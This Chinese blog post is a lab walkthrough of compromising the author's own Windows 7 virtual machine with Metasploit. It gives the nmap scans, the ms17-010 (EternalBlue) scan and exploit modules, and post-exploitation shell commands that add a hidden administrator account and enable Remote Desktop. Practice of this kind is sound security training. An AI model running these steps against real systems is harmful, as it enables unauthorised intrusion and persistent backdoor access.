Ywc

Metasploit 渗透练习

Word count: 586 / Reading time: 2 min
2018/09/29 Share

前言

书到用时方恨少,还是要勤加练习才能应对各种比赛。

渗透测试环境准备

准备一台虚拟x64的windows7和一台kali机,两个都要设置成桥接模式。

win7要打开网络共享

msf

看到上面这样子,就是成功了

之后这台虚拟机就可以不用理它了,开着就好.

开始入侵1

首先更新一下metasploit

msfupdate

注意,最新版本的metasploit会提示
msfupdate is no longer supported when Metasploit is part of the operating system. Please use ‘apt update; apt install metasploit-framework’

输入apt update && apt install metasploit-framework 更新系统。

信息收集—扫描局域网内的机器ip地址

一般使用nmap,也可以使用xerosploit

扫描存活主机:

1
nmap -sn 192.168.31.0/24

msf

发现使用vmware开的windows7虚拟机的ip地址

扫描该主机存活端口:

1
nmap 192.168.31.181

msf

发现开放445端口,OK,可以利用永恒之蓝漏洞进行攻击。

使用meatsploit攻击

  • 登录kali,启动meatsploit: msfconsole

msf

  • 搜索永恒之蓝模块:search ms17-010

msf

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击模块,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

  • 使用检测模块:use auxiliary/scanner/smb/smb_ms17_010

show options //show options或者options,查看需要填写的参数,其中标红处如果是yes,表示这行参数必须填写,如果是no,就是选填,其中有LHOST和RHOST是空,需要填写攻击目标主机的信息。

  • 设置目标IP或网段:set RHOSTS 192.168.31.181

  • 执行扫描:run

显示Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit) 证明可以使用永恒之蓝进行攻击。

msf

  • 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

  • 查看需要填写的参数:show options

  • 设置攻击目标ip set RHOSTS 192.168.31.181

  • 执行攻击 exploit

msf

msf

如图可见,攻击成功,之后就可以通过Shell对目标机进行控制。

通过Shell 对靶机进行控制

创建用户名密码 blue/blue net user blue blue /add

将用户blue添加入管理组 net localgroup administrators blue /add

开启远程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali远程桌面连接Win7 rdesktop 192.168.31.181:3389

原文作者: Ywc

原文链接: https://yinwc.github.io/2018/09/29/msf/

发表日期: September 29th 2018, 7:30:30 pm

版权声明:

CATALOG
  1. 1. 前言
  2. 2. 渗透测试环境准备
  3. 3. 开始入侵1
    1. 3.1. 信息收集—扫描局域网内的机器ip地址
    2. 3.2. 使用meatsploit攻击
    3. 3.3. 通过Shell 对靶机进行控制